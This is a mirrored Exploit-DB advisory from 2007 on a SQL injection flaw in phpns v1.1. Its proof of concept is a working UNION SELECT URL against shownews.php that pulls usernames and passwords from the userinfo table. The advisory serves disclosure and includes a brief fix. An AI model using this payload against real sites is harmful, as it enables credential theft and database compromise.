bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4339.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
951 B
Text
Raw Blame History

PHPNS SQL Injection
Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection
Original advisory: http://14house.blogspot.com/2007/08/phpns-sql-injection.html
Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >
SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variable is $nid and maybe
others.
Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]
Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all
null,null,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),null,null,null
from userinfo/*
Solution:
Your script should filter metacharacters from user input.
Vendor:
Contacted and replyed that they are fixing it.
# milw0rm.com [2007-08-29]
Reference in a new issue View git blame Copy permalink